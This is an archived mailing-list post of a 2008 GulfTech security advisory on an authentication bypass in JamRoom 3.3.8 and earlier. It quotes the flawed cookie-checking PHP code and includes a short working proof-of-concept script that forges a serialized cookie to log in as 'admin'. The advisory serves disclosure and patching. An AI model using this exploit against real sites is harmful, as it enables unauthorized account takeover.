Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

JamRoom <= 3.3.8 Authentication Bypass

from [GulfTech Security Research] Network Security [Permanent Link]
Subject: JamRoom <= 3.3.8 Authentication Bypass
Date: Mon, 28 Jul 2008 10:43:40 -0500 
##########################################################
# GulfTech Security Research                July 28, 2008
##########################################################
# Vendor : Talldude Networks, LLC
# URL : http://www.jamroom.net/
# Version : Jamroom <= 3.3.8
# Risk : Authentication Bypass
##########################################################


Description:
Jamroom is a popular online social media cms used to host artist sites
and create music communities. It is vulnerable to a flaw in datatype
comparison that allows for an attacker to bypass the authentication
process completely and gain access to any account with only a username.
This vulnerability has been patched in the latest version of JamRoom and
all users are encouraged to upgrade as soon as possible.



Authentication Bypass:
There is a serious flaw in the Jamroom authentication mechanism that
allows for an attacker to completely bypass the authentication process
with a specially crafted cookie. The vulnerable code in question can
be found in /includes/jamroom-misc.inc.php @ lines 3667-3681 within
the jrCookie() function

list($user,$hash) = unserialize(stripslashes($_val));
$user = trim(genc('get',$user));
$req = "SELECT user_nickname, user_password
FROM {$jamroom_db['user']}
WHERE user_nickname = '". dbEscapeString($user) ."'
LIMIT 1";
$_rt = dbQuery($req,'SINGLE');
if (strlen($_rt['user_password']) === 0) {
return(false);
}
if (md5($_rt['user_password'] . $sect) == $hash) {
print_r($rt);
return($_rt);
}

The problem with the above code is that $_val is a user supplied value
taken from $_COOKIE['JMU_Cookie']. Since the cookie data is serialized
an attacker can specify data types such as boolean values, and bypass
the password check, and authenticate with only a username. If the first
byte of the password hash stored in the database is numerical then a
boolean value of true can be used in place of an actual password, and
if the first byte is a letter then a boolean value of false is required.

<?php
$data = array();
$user = 'admin'; // Target

$data[0] = base64_encode(serialize($user));
$data[1] = (bool)0;
echo "\n\n===[ 0 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
$data[1] = (bool)1;
echo "\n\n===[ 1 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
?>

The above script is an example of how this works, and will create a
cookie to login as the user admin. For more information check out the
comparison operators section of the php manual. Specifically the
"identical" operator.



Solution:
The JamRoom developers were very prompt in addressing this issue, and
have released an updated version for download. All users are encouraged
to upgrade their JamRoom installation as soon as possible.



Credits:
James Bercegay of the GulfTech Security Research Team



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00117-07282008

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • JamRoom <= 3.3.8 Authentication Bypass, GulfTech Security Research <=
Previous by Date:  [security bulletin] HPSBMA02353 SSRT080066 rev.1 - HP OpenView Internet Services Running Probe Builder, Remote Denial of Service (DoS), security-alert
Next by Date:  RE: Windows Vista Power Management & Local Security Policy, Greg
Previous by Thread:  [security bulletin] HPSBMA02353 SSRT080066 rev.1 - HP OpenView Internet Services Running Probe Builder, Remote Denial of Service (DoS), security-alert
Next by Thread:  Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02, supportrup
Indexes:  [Date] [Thread] [Top] [All Lists]